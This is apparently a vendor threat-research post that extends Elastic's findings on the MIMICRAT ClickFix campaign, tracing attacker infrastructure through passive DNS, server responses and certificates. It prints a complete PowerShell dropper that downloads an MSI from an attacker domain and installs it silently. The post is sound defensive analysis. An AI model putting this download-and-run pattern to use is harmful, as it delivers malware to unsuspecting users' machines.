Investigations into the MIMICRAT ClickFix campaign

Introduction

The Elastic Security Labs team recently published an insightful article about a “ClickFix” campaign, in which victims are encouraged to execute malicious actions themselves through copy-and-paste commands. This technique allows attackers to deliver a RAT known as MIMICRAT through multiple legitimate but compromised websites.

The Stormshield Customer Security Lab team observed that the campaign was still ongoing. Driven by our need to better understand the threat, we conducted additional investigations on March 3, 2026. These efforts enabled us to gather further information as well as additional Indicators of Compromise (IOCs).

The initial investigations

Elastic Security Labs' initial report contains the following IOC linked to MIMICRAT:

Thanks to the passive DNS resolution capabilities of the Validin tool applied to the IP addresses above, we obtained a long list of additional domains:

Several lessons can already be noted:

• Most of these records were registered in early January.
• The remaining ones were added later.
• Some were even registered on the day this report was written. It is therefore likely that additional domains may appear in the coming weeks.
• All of these domains were registered through the registrar NiceNIC.

The art of pivoting

IP 45.13.212[.]250

HTTP responses from the first payload delivery server (45.13.212[.]250) were not very useful.

The headers appear quite standard, but the returned data varies depending on the requested URL. This suggests that the server likely relies on virtual hosts to route requests. In any case, our requests only returned a blank page containing a short message such as “db error”, “wp db error”, “OK”, “sever error” (sic), or sometimes simply “NO”. None of these elements provided useful information that could be leveraged for further pivoting.

IP 45.13.212[.]251

We obtained more interesting results from the second server (45.13.212[.]251), which returned a blank page displaying the message “hosting is blocked.” Pivoting on this text revealed several additional IP addresses serving the same page. Such a pattern is relatively uncommon and provided a useful pivot for further analysis.

We were lucky because at the time of writing, these responses were being replaced with HTTP 403 “Access Forbidden” responses.

Additional IP retrieved:

By using the same DNS passive resolution, we get an impressive list of additional domains.

By analyzing these domains, we observed the following:

• As previously highlighted by the IOCs identified by Elastic Security Labs, all of these domains were registered in early 2026 through the registrar NiceNIC.
• The certificate associated with the domain mispolishal[.]com was misconfigured and not valid for that website. The server was in fact presenting the certificate for avprog[.]cc. Attackers make mistakes sometimes.
• Using GoBuster, we identified several files and directories hosted on these domains.
  • Some endpoints are fairly common, such as /js or /ps. However, others appear more interesting from an investigative perspective, including /cmd, /update, and similar paths.

We are seeing more and more similarities.

The domain msservice[.]network even owns a folder called /friend which downloads a powershell script:

$name = "ProgramData";
$programData = (Get-Item "env:$name").Value;
$inst = "FriendIstaller";
$path = Join-Path $programData $inst;
New-Item -ItemType Directory -Path $path -Force | Out-Null;
$path = Join-Path $path "friend.msi";
Start-BitsTransfer "https://msservice.network/friend.msi" "$path";
Unblock-File $path;
Start-Process msiexec.exe -ArgumentList "/i `"$path`" /qn /norestart" -Wait

This PowerShell script silently downloads an MSI file named friend.msi into a subfolder of C:\ProgramData. At the time of our analysis, the MSI file was no longer available at the referenced location. As a result, we were unable to establish a direct link between this script and the broader campaign.

Additionally, the domain plugins-manager[.]network and the subdomain www.plugins-manager[.]network host dropper-style PowerShell scripts similar to those described by Elastic Security Labs.

IP 23.227.202[.]114

We then took a closer look at the C2 server used for post-infection activity (23.227.202[.]114). The HTTP response returns a simple webpage titled “CryptoBet Arena.” Pivoting on this title revealed following additional domains:

Both domains were registered in mid-January and resolve to an IP address belonging to a shared cloud hosting environment. When accessed, they return an HTTP page with the same content as the exploitation server. Based on these similarities, we assess that they are part of the attacker’s infrastructure.

Conclusion

Despite initial detection, attackers didn't stop. We spotted new elements as part of their infrastructure, with more likely to appear soon. For the initially compromised websites, Elastic Security Labs has discovered a few, though many more likely exist. Stay vigilant.

How to answer

• Conduct regular cybersecurity awareness campaigns on phishing techniques in general, and on ClickFix in particular.
• Follow cybersecurity best practices: network segmentation, strict access control policies, frequent updates, and regular backups.
• On Stormshield Network Security firewalls, enable IPS on incoming and outgoing traffic, and activate filtering based on IP reputation.

Additional IOC spotted